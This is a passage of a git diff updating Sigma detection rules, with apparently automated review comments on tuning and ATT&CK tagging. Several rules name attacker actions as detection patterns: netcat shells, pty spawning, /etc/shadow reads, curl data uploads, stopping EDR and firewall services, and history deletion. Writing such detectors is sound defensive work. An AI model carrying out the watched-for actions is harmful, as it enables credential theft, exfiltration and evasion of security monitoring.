'zdHJhdHVtK3RjcDovL' + - 'c3RyYXR1bSt1ZHA6Ly' + - 'N0cmF0dW0rdWRwOi8v' + - 'zdHJhdHVtK3VkcDovL' + condition: selection falsepositives: - - Legitimate use of crypto miners + - Legitimate use of crypto miners level: high 
diff --git a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml new file mode 100644 index 000000000..580eece01 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml @@ -0,0 +1,22 @@ +title: Curl Usage on Linux +id: ea34fb97-e2c4-4afb-810f-785e4459b194 +status: experimental +description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl' + condition: selection +falsepositives: + - Scripts created by developers and admins + - Administrative activity +level: low +tags: + - attack.command_and_control + - attack.t1105 diff --git a/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml b/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml index c47444781..564c37a36 100644 --- a/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml +++ b/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml @@ -1,7 +1,7 @@ title: Linux Doas Tool Execution id: 067d8238-7127-451c-a9ec-fa78045b618b status: stable -description: Detects the doas tool execution in linux host platform. +description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does. references: - https://research.splunk.com/endpoint/linux_doas_tool_execution/ - https://www.makeuseof.com/how-to-install-and-use-doas/ diff --git a/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml b/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml index 34ac9dccd..85ee9c4e2 100644 
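Review bot: With `Image|endswith: '/curl'` as the sole condition the rule fires on every curl start — package managers, health checks, cloud metadata lookups — so on most fleets it behaves as an audit query rather than a detection, and the description's "indicates a file download" overstates what the selection checks. Either say so in the description (`Intended as a hunting/audit rule; expect high volume on servers`) and set `level: informational`, or narrow the selection to download-shaped invocations, e.g. `CommandLine|contains: ['-o', '-O', '--output', '--remote-name']`. The `falsepositives` entries already concede that nearly all matches are benign, which argues for the lower level.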
--- a/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml +++ b/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml @@ -1,9 +1,10 @@ title: File Deletion id: 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57 status: stable -description: Detects file deletion using "rm" or "shred" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity +description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity author: Ömer Günal, oscd.community date: 2020/10/07 +modified: 2022/09/15 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md logsource: @@ -14,6 +15,7 @@ detection: Image|endswith: - '/rm' # covers /rmdir as well - '/shred' + - '/unlink' condition: selection falsepositives: - Legitimate administration activities diff --git a/rules/linux/process_creation/proc_creation_lnx_local_account.yml b/rules/linux/process_creation/proc_creation_lnx_local_account.yml index d839d854b..fee4138fe 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_account.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_account.yml @@ -6,7 +6,7 @@ author: Alejandro Ortuno, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md date: 2020/10/08 -modified: 2022/07/07 +modified: 2022/09/15 logsource: category: process_creation product: linux @@ -16,9 +16,14 @@ detection: selection_2: CommandLine|contains: '''x:0:''' selection_3: - Image|endswith: '/cat' + Image|endswith: + - '/cat' + - '/head' + - '/tail' + - '/more' CommandLine|contains: - '/etc/passwd' + - '/etc/shadow' - '/etc/sudoers' selection_4: Image|endswith: '/id' 
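Review bot: Adding `/etc/shadow` to `selection_3` folds a credential-access read (password hashes) into an account-discovery rule whose referenced atomic is T1087.001, as the context line above shows, and whose level is presumably tuned for `/etc/passwd` enumeration; a `cat /etc/shadow` warrants a higher level and T1003.008 tagging than a passwd listing, and merging them means the shadow read inherits the lower severity. Consider leaving `/etc/shadow` out of this rule and giving it a dedicated rule, or at minimum extending the description to say the rule now covers shadow reads. The rule's `condition`, `level` and `tags` lie outside the hunk.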
diff --git a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml index aa30ec573..1bf72b8ea 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml @@ -6,7 +6,7 @@ author: Ömer Günal, Alejandro Ortuno, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md date: 2020/10/11 -modified: 2022/07/07 +modified: 2022/09/15 logsource: category: process_creation product: linux @@ -14,7 +14,11 @@ detection: selection_1: Image|endswith: '/groups' selection_2: - Image|endswith: '/cat' + Image|endswith: + - '/cat' + - '/head' + - '/tail' + - '/more' CommandLine|contains: '/etc/group' condition: 1 of selection* falsepositives: diff --git a/rules/linux/process_creation/proc_creation_lnx_nohup.yml b/rules/linux/process_creation/proc_creation_lnx_nohup.yml index 1b8abaea7..1c902a284 100644 --- a/rules/linux/process_creation/proc_creation_lnx_nohup.yml +++ b/rules/linux/process_creation/proc_creation_lnx_nohup.yml 
@@ -4,17 +4,17 @@ status: experimental description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' references: - - https://gtfobins.github.io/gtfobins/nohup/ - - https://en.wikipedia.org/wiki/Nohup - - https://www.computerhope.com/unix/unohup.htm + - https://gtfobins.github.io/gtfobins/nohup/ + - https://en.wikipedia.org/wiki/Nohup + - https://www.computerhope.com/unix/unohup.htm date: 2022/06/06 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - Image|endswith: '/nohup' - condition: selection + selection: + Image|endswith: '/nohup' + condition: selection falsepositives: - - Administrators or installed processes that leverage nohup + - Administrators or installed processes that leverage nohup level: medium diff --git a/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml b/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml index 7b7fbcd02..b56b56825 100644 --- a/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml +++ b/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml @@ -26,4 +26,4 @@ detection: condition: selection_image and 1 of selection_cli* falsepositives: - Unknown -level: high \ No newline at end of file +level: high diff --git a/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml b/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml index 76ac81188..1fef2d0a7 100644 --- a/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml +++ b/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml 
@@ -1,18 +1,21 @@ title: Security Software Discovery id: c9d8b7fd-78e4-44fe-88f6-599135d46d60 status: test -description: Detects usage of system utilities (only grep for now) to discover security software discovery +description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery author: Daniil Yugoslavskiy, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md date: 2020/10/19 -modified: 2022/07/11 +modified: 2022/09/15 logsource: category: process_creation product: linux detection: selection: - Image|endswith: '/grep' + Image|endswith: + # You can add more grep variations such as fgrep, rgrep...etc + - '/grep' + - '/egrep' CommandLine|contains: - 'nessusd' # nessus vulnerability scanner - 'td-agent' # fluentd log shipper diff --git a/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml b/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml index b800cd73a..e48f83c9b 100644 --- a/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml +++ b/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml 
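Review bot: The rewritten description still reads "to discover security software discovery"; since the line is edited anyway, `description: Detects usage of system utilities (only grep and egrep for now) to discover security software` removes the doubled noun. On most distributions `egrep` is a small shell wrapper that exec's `grep -E`, so an `/egrep` match will often be followed by a second process-creation event that the existing `/grep` entry already catches; a one-line comment noting the likely double alert would help whoever tunes this. The `CommandLine|contains` list continues past the end of the hunk.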
@@ -17,66 +17,66 @@ detection: selection_iptables_1: Image|endswith: '/service' CommandLine|contains|all: - - 'iptables' - - 'stop' + - 'iptables' + - 'stop' selection_iptables_2: Image|endswith: '/service' CommandLine|contains|all: - - 'ip6tables' - - 'stop' + - 'ip6tables' + - 'stop' selection_iptables_3: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'iptables' - - 'stop' + - 'iptables' + - 'stop' selection_iptables_4: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'ip6tables' - - 'stop' + - 'ip6tables' + - 'stop' selection_firewall_1: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'firewalld' - - 'stop' + - 'firewalld' + - 'stop' selection_firewall_2: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'firewalld' - - 'disable' + - 'firewalld' + - 'disable' selection_carbonblack_1: Image|endswith: '/service' CommandLine|contains|all: - - 'cbdaemon' - - 'stop' + - 'cbdaemon' + - 'stop' selection_carbonblack_2: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'cbdaemon' - - 'off' + - 'cbdaemon' + - 'off' selection_carbonblack_3: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'cbdaemon' - - 'stop' + - 'cbdaemon' + - 'stop' selection_carbonblack_4: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'cbdaemon' - - 'disable' + - 'cbdaemon' + - 'disable' selection_selinux: Image|endswith: '/setenforce' CommandLine|contains: '0' selection_crowdstrike_1: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'stop' - - 'falcon-sensor' + - 'stop' + - 'falcon-sensor' selection_crowdstrike_2: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'disable' - - 'falcon-sensor' + - 'disable' + - 'falcon-sensor' condition: 1 of selection* falsepositives: - Legitimate administration activities 
diff --git a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml new file mode 100644 index 000000000..7b1778780 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml @@ -0,0 +1,26 @@ +title: Disable Or Stop Services +id: de25eeb8-3655-4643-ac3a-b662d3f26b6b +status: experimental +description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services +author: Nasreddine Bencherchali +date: 2022/09/15 +references: + - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html +tags: + - attack.defense_evasion +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: + - '/service' + - '/systemctl' + - '/chkconfig' + CommandLine|contains: + - 'stop' + - 'disable' + condition: selection +falsepositives: + - Legitimate administration activities +level: medium diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml new file mode 100644 index 000000000..c47d62511 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml 
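Review bot: The new rule's `CommandLine|contains` values `stop` and `disable` have no word boundaries and pair with `/systemctl`, `/service` and `/chkconfig`, so every `systemctl stop <unit>` from package maintainer scripts, shutdown hooks or configuration management fires, which is far broader than `level: medium` suggests; consider `' stop'` / `' disable'` with a leading space and `level: low`, or mark it as a hunting rule in the description. `chkconfig` turns services off with `off`, not `disable` (the re-indented security_tools_disabling rule in this commit uses `'off'` for it) and has no `stop` verb, so the `/chkconfig` entry here cannot match anything meaningful. The `tags` list carries only the tactic; `- attack.t1489` (Service Stop) is the matching technique.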
@@ -0,0 +1,37 @@ +title: Suspicious Curl File Upload - Linux +id: 00b90cc1-17ec-402c-96ad-3a8117d7a582 +related: + - id: 00bca14a-df4e-4649-9054-3f2aa676bc04 + type: derived +status: experimental +description: Detects a suspicious curl process start the adds a file to a web request +author: Nasreddine Bencherchali +references: + - https://twitter.com/d1r4c/status/1279042657508081664 + - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76 + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file + - https://curl.se/docs/manpage.html + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl' + CommandLine|contains: + - ' -F ' + - ' --form' # Also covers the "--form-string" + - ' -T ' + - ' --upload-file ' + - ' -d ' + - ' --data ' + - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode" + condition: selection +falsepositives: + - Scripts created by developers and admins +level: medium +tags: + - attack.exfiltration + - attack.t1567 + - attack.t1105 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml new file mode 100644 index 000000000..f38914616 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml 
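Review bot: `' -d '`, `' --data '` and `' --data-'` are the arguments of practically every scripted HTTP POST (API clients, webhooks, package tooling), so at `level: medium` this rule will be dominated by benign traffic; either move the `-d`/`--data` family into a lower-level rule or say in the description that it is intended for hunting. All patterns require a trailing space, so curl's attached-argument spellings (option and value in one token) are not matched; that coverage limit deserves a comment next to the list rather than being discovered in an incident. The description has a typo: `description: Detects a suspicious curl process start that adds a file to a web request`.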
@@ -0,0 +1,28 @@ +title: Suspicious Curl Change User Agents - Linux +id: b86d356d-6093-443d-971c-9b07db583c68 +related: + - id: 3286d37a-00fd-41c2-a624-a672dcd34e60 + type: derived +status: experimental +description: Detects a suspicious curl process start on linux with set useragent options +author: Nasreddine Bencherchali +references: + - https://curl.se/docs/manpage.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl' + CommandLine|contains: + - ' -A ' + - ' --user-agent ' + condition: selection +falsepositives: + - Scripts created by developers and admins + - Administrative activity +level: medium +tags: + - attack.command_and_control + - attack.t1071.001 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml index 3727dee7e..49cd31ce6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml 
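Review bot: The `-A`/`--user-agent` pair misses the equivalent header form `-H 'User-Agent: ...'`, which is at least as common in scripts; a second selection with `CommandLine|contains|all: [' -H', 'User-Agent']` would close that gap. Setting a user agent is routine for the developer and admin scripts the falsepositives section already names, so `level: low` fits a single-indicator rule better than medium. The description calls the process start suspicious although nothing beyond the option itself is matched; `description: Detects a curl process start on Linux that sets a custom user agent` states what the rule actually does.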
@@ -4,23 +4,31 @@ status: experimental description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/rm' - selection_history: - - CommandLine|contains: - - '/.bash_history' - - '/.zsh_history' - - CommandLine|endswith: '_history' - condition: all of selection* + selection: + Image|endswith: + - '/rm' + - '/unlink' + - '/shred' + selection_history: + - CommandLine|contains: + - '/.bash_history' + - '/.zsh_history' + - CommandLine|endswith: + - '_history' + - '.history' + - 'zhistory' + condition: all of selection* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: high tags: - - attack.impact - - attack.t1565.001 + - attack.impact + - attack.t1565.001 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml index 93b722ac9..128644fd6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml 
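Review bot: The tags `attack.impact` / `attack.t1565.001` (Stored Data Manipulation) do not describe what this rule detects; deleting shell history is ATT&CK T1070.003 (Clear Command History) under Defense Evasion, and the T1552.003 reference added in this hunk is about reading history files, not deleting them. Shell built-ins and redirections never create a process, so only the `rm`/`unlink`/`shred` path is visible here; a comment such as `# history cleared through shell built-ins leaves no process_creation event` would document that boundary for analysts. The `modified` date and the new `endswith` values are otherwise consistent with the recon sibling.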
@@ -4,23 +4,32 @@ status: experimental description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/cat' - selection_history: - - CommandLine|contains: - - '/.bash_history' - - '/.zsh_history' - - CommandLine|endswith: '_history' - condition: all of selection* + selection: + Image|endswith: + - '/cat' + - '/head' + - '/tail' + - '/more' + selection_history: + - CommandLine|contains: + - '/.bash_history' + - '/.zsh_history' + - CommandLine|endswith: + - '_history' + - '.history' + - 'zhistory' + condition: all of selection* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: medium tags: - - attack.reconnaissance - - attack.t1592.004 + - attack.reconnaissance + - attack.t1592.004 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml b/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml index 5401c761c..29fd55f03 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml 
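Review bot: The tags still say `attack.reconnaissance` / `attack.t1592.004`, which are pre-compromise techniques about a victim's client configuration, while the reference added in this very hunk is the atomic test for T1552.003 (Unsecured Credentials: Bash History); `- attack.credential_access` and `- attack.t1552.003` describe reading history files on an already compromised host. The reader list now mirrors the local_groups rule (`/cat`, `/head`, `/tail`, `/more`) but both omit `less`; adding `- '/less'` to each keeps them aligned. `CommandLine|endswith: '_history'` also matches files such as `.python_history` or `.mysql_history`, which is probably intended but worth a one-line comment.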
@@ -3,29 +3,28 @@ id: ea3ecad2-db86-4a89-ad0b-132a10d2db55 status: experimental description: Detects suspicious interactive bash as a parent to rather uncommon child processes references: - - Internal Research + - Internal Research date: 2022/03/14 author: Florian Roth logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: selection: - ParentCommandLine: 'bash -i' + ParentCommandLine: 'bash -i' anomaly1: - CommandLine|contains: - - '-c import ' - - 'base64' - - 'pty.spawn' + CommandLine|contains: + - '-c import ' + - 'base64' + - 'pty.spawn' anomaly2: - Image|endswith: - - 'whoami' - - 'iptables' - - '/ncat' - - '/nc' - - '/netcat' + Image|endswith: + - 'whoami' + - 'iptables' + - '/ncat' + - '/nc' + - '/netcat' condition: selection and 1 of anomaly* falsepositives: - - Legitimate software that uses these patterns + - Legitimate software that uses these patterns level: medium - diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml b/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml index 3d057b223..9f4e466ec 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml @@ -3,7 +3,7 @@ id: 880973f3-9708-491c-a77b-2a35a1921158 status: experimental description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell references: - - Internal Research + - Internal Research date: 2022/03/14 modified: 2022/07/26 author: Florian Roth 
@@ -11,26 +11,25 @@ tags: - attack.defense_evasion - attack.t1140 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|startswith: - - 'sh -c ' - - 'bash -c ' - selection_exec: - - CommandLine|contains: + selection: + CommandLine|startswith: + - 'sh -c ' + - 'bash -c ' + selection_exec: + - CommandLine|contains: - '| bash ' - '| sh ' - '|bash ' - '|sh ' - - CommandLine|endswith: + - CommandLine|endswith: - '| bash' - '| sh' - '|bash' - ' |sh' - condition: all of selection* + condition: all of selection* falsepositives: - Legitimate software that uses these patterns level: medium - diff --git a/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml b/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml index 4b718aee7..6f04b95d5 100644 --- a/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml +++ b/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml @@ -6,13 +6,13 @@ author: Ömer Günal and remotephone, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md date: 2020/10/06 -modified: 2022/07/11 +modified: 2022/09/15 logsource: category: process_creation product: linux detection: - selection1: - Image|endswith: + selection: + - Image|endswith: - '/firewall-cmd' - '/ufw' - '/iptables' @@ -22,9 +22,8 @@ detection: - '/ifconfig' - '/systemd-resolve' - '/route' - selection2: - CommandLine|contains: '/etc/resolv.conf' - condition: 1 of selection* + - CommandLine|contains: '/etc/resolv.conf' + condition: selection falsepositives: - Legitimate administration activities level: informational diff --git a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml index 7d638a7f8..0e2f4a456 100644 
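Review bot: The `CommandLine|endswith` list mixes `'|bash'` with `' |sh'` (leading space), so a command line ending in `|sh` without a preceding space is not matched while its bash twin is; `- '|sh'` makes the four entries symmetric with the `contains` list above it. These are context lines in the re-indented hunk, so the asymmetry predates the commit, but it now sits in the touched block. The `falsepositives` and `level` lines close the hunk; no other part of this rule is visible.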
--- a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml +++ b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml @@ -4,20 +4,19 @@ status: experimental description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges author: Nasreddine Bencherchali references: - - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 + - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 date: 2022/07/05 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/sudo' - CommandLine|contains: 'execve_hijack' - condition: selection + selection: + Image|endswith: '/sudo' + CommandLine|contains: 'execve_hijack' + condition: selection falsepositives: - - Unlikely + - Unlikely level: high tags: - - attack.defense_evasion - - attack.privilege_escalation - + - attack.defense_evasion + - attack.privilege_escalation diff --git a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml index d29fef02a..f453de63c 100644 --- a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml +++ b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml 
@@ -4,24 +4,24 @@ status: experimental description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script author: Nasreddine Bencherchali references: - - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh + - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh date: 2022/07/05 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/sudo' - CommandLine|contains|all: - - ' tc ' - - ' enp0s3 ' - CommandLine|contains: - - ' qdisc ' - - ' filter ' - condition: selection + selection: + Image|endswith: '/sudo' + CommandLine|contains|all: + - ' tc ' + - ' enp0s3 ' + CommandLine|contains: + - ' qdisc ' + - ' filter ' + condition: selection falsepositives: - - Unlikely + - Unlikely level: high tags: - - attack.defense_evasion - - attack.t1014 + - attack.defense_evasion + - attack.t1014 diff --git a/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml b/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml index 7c10bd097..3962cf127 100644 --- a/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml +++ b/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml @@ -4,7 +4,7 @@ status: experimental description: Detects deletion of local audit logs author: remotephone, oscd.community date: 2020/10/11 -modified: 2022/07/07 +modified: 2022/09/16 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md logsource: @@ -12,7 +12,10 @@ logsource: category: process_creation detection: selection1: - Image|endswith: '/rm' + Image|endswith: + - '/rm' + - '/unlink' + - '/shred' selection_cli_1: CommandLine|contains: '/var/log' selection_cli_2: 
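Review bot: `'/shred'` in `selection1` is copied from the Linux history-delete rule, but macOS does not ship `shred`; it only appears with third-party GNU coreutils, which by default install it as `gshred`, so the entry adds almost no coverage on this platform. Keeping it is harmless, but a comment such as `# shred is not part of macOS; present only with GNU coreutils installed` would stop the next reader from assuming parity with the Linux rule. `selection_cli_2` and the condition lie past the end of the hunk.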
diff --git a/rules/web/web_cve_2022_31659_vmware_rce.yml b/rules/web/web_cve_2022_31659_vmware_rce.yml index f4c8b747d..8060bcb42 100644 --- a/rules/web/web_cve_2022_31659_vmware_rce.yml +++ b/rules/web/web_cve_2022_31659_vmware_rce.yml @@ -11,7 +11,7 @@ logsource: detection: selection: cs-method: 'POST' - c-uri|contains: '/SAAS/jersey/manager/api/migrate/tenant' # Investigate the host header to spot the difference between benign and malicious requests to this URL + c-uri|contains: '/SAAS/jersey/manager/api/migrate/tenant' # Investigate the contents of the post body and look for any suspicious hosts that might be controlled by the attacker condition: selection falsepositives: - Vulnerability scanners diff --git a/rules/windows/builtin/application/win_builtin_remove_application.yml b/rules/windows/builtin/application/win_builtin_remove_application.yml index 3209074b4..e9e4cc9d5 100644 --- a/rules/windows/builtin/application/win_builtin_remove_application.yml +++ b/rules/windows/builtin/application/win_builtin_remove_application.yml @@ -1,9 +1,10 @@ -title: An Application Is Uninstall +title: Application Uninstalled id: 570ae5ec-33dc-427c-b815-db86228ad43e status: experimental -description: An application have been remove check if it is a critical +description: An application has been removed. Check if it is critical. author: frack113 date: 2022/01/28 +modified: 2022/09/17 logsource: product: windows service: application @@ -16,6 +17,7 @@ detection: condition: selection falsepositives: - Unknown +#Level is low as it can be very verbose, you can use the top or less 10 "Product Name" to have a quick overview level: low tags: - attack.impact diff --git a/rules/windows/builtin/security/win_impacket_psexec.yml b/rules/windows/builtin/security/win_impacket_psexec.yml index 036a3b101..434d38015 100644 --- a/rules/windows/builtin/security/win_impacket_psexec.yml +++ b/rules/windows/builtin/security/win_impacket_psexec.yml 
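Review bot: The new comment tells the analyst to inspect the POST body, but the fields this rule uses (`cs-method`, `c-uri`) come from web-server access logs, which do not record request bodies; the body is only available from a WAF, reverse proxy or packet capture. Rewording it to `# Access logs carry no POST body; correlate with WAF/proxy captures to check the tenant host named in the request` keeps the guidance actionable for someone who only has this logsource. The rule's title and references are outside the hunk.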
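Review bot: The added comment `#Level is low as it can be very verbose, you can use the top or less 10 "Product Name" to have a quick overview` is hard to parse; `# Level is low because this event is very verbose; a top/bottom-10 count of "Product Name" gives a quick overview` says the same thing clearly. A space after `#` also matches the comment style of the other rules in this diff (`# looking for the string ...`, `# Investigate ...`). The detection block of this rule is outside the hunk.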
@@ -6,7 +6,7 @@ author: Bhabesh Raj references: - https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html date: 2020/12/14 -modified: 2022/08/11 +modified: 2022/09/22 logsource: product: windows service: security @@ -16,9 +16,9 @@ detection: EventID: 5145 ShareName: '\\\\\*\\IPC$' # looking for the string \\*\IPC$ RelativeTargetName|contains: - - 'RemCom_stdint' - - 'RemCom_stdoutt' - - 'RemCom_stderrt' + - 'RemCom_stdin' + - 'RemCom_stdout' + - 'RemCom_stderr' condition: selection1 falsepositives: - Unknown diff --git a/rules/windows/builtin/security/win_scm_database_privileged_operation.yml b/rules/windows/builtin/security/win_scm_database_privileged_operation.yml index ed9b84694..7141e95ce 100644 --- a/rules/windows/builtin/security/win_scm_database_privileged_operation.yml +++ b/rules/windows/builtin/security/win_scm_database_privileged_operation.yml @@ -6,7 +6,7 @@ author: Roberto Rodriguez @Cyb3rWard0g, Tim Shelton references: - https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html date: 2019/08/15 -modified: 2022/06/30 +modified: 2022/09/18 logsource: product: windows service: security @@ -22,7 +22,7 @@ detection: condition: selection and not filter falsepositives: - Unknown -level: high +level: medium tags: - attack.privilege_escalation - attack.t1548 diff --git a/rules/windows/builtin/win_susp_logon_newcredentials.yml 